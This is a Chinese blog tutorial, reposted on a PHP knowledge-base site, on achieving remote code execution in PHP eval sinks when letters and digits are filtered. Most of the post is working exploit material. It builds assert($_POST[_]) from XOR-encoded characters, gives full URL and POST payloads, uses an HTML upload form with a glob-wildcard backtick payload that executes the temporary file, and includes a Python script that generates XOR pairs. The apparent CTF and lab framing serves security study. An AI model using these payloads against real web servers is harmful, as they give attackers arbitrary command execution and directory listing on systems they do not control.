IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 无字母数字RCE -> 正文阅读

[PHP知识库]无字母数字RCE

版本为php5

php5中assert是一个函数,我们可以通过 f = ′ a s s e r t ′ ; f='assert'; f=assert;f(…);这样的方法来动态执行任意代码。

但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。

无数字和字母rce

测试代码

<?php

if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {

 eval($_GET['shell']);

}



<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);

在这里面经过url编码的字符能够绕过

所以%01这些不会被匹配

<?php

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');//$_='assert';

$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';

$___=$$__;

$_($___[_]); //所有的合起来就是 assert($_POST[_]);

payload

http://127.0.0.1/test/p.php?shell=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);

还要post一个参数

_=phpinfo();
在这里插入图片描述

同理

_=print_r(scandir('/'));可以直接获取根目录了

_=print_r(scandir(getcwd()));

参考链接:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

对于linux中的shell是支持正则表达式的,当你忘记某些字符时可以通过? % *来代替

所以我们要执行一个命令的话可以直接用?替代

而且大多数服务器都是用的linux

直接在kali里面实验了

不过用这种方法rce 的话需要上传一个临时文件

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>POST数据包POC</title>

</head>

<body>

<form action="http://" method="post" enctype="multipart/form-data">

<!--链接是当前打开的题目链接-->

  <label for="file">文件名:</label>

  <input type="file" name="file" id="file"><br>

  <input type="submit" name="submit" value="提交">

</form>

</body>

</html>

在这个文件下写入需要调用的命令

#!/bin/sh

ls

意思是调用ls命令

当然肯定还是要先获取文件内容我们默认上传的文件会保存在/tmp目录下

命名为/tmp/phpxxxxxx

利用``内$会解析的特性,通过位运算,执行系统命令

[@-[]是linux下面的匹配符,是进行匹配的大写字母。

所以

shell=?><?=`. /???/????????[@-[]`;?>

用+代替空格绕过
在这里插入图片描述

抓包修改文件内容就可以任意命令执行了

不过不知道为什么有时候有有时候没有,记得多刷新几次

参考链接:https://www.freebuf.com/articles/web/186298.html

无字母rce

测试代码

<?php

show_source(__FILE__);

$mess=$_POST['mess'];

if(preg_match("/[a-zA-Z]/",$mess)){

  die("invalid input!");

}

eval($mess);

在这里插入图片描述

读取到了当前同一个目录下的p.php

mess=?><?=$_="3317!315288"^"@[^@~@^@@[]";$_(("0"^"@").(".").("030"^"@[@"));

这串字符串的意思是show_source(p.php)

不过是需要异或运算后

这里有个异或运算脚本

valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "

answer = "show_source"

tmp1, tmp2 = '', ''
for c in answer:
  for i in valid:
    for j in valid:
      if (ord(i) ^ ord(j) == ord(c)):
        tmp1 += i
        tmp2 += j
        break
    else:
      continue
    break
print(tmp1, tmp2)

除此之外也可以用上面的方法

Url:

http://127.0.0.1/test/p.php?shell=$_=(''^'').(''^'').(''^'');$__='_'.(' '^']').('%2F'^'`').(''^']').('	'^']');$___=$$__;$_($___[_]);

post数据:

mess=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);&_=phpinfo();

当然我肯定先用glob()看看当前目录有什么东西
在这里插入图片描述

穿越到上级目录就用…/
在这里插入图片描述

mess=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);&_=print_r(show_source('p.php'));
  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-07 10:36:24  更:2021-09-07 10:36:26 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 20:53:22-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计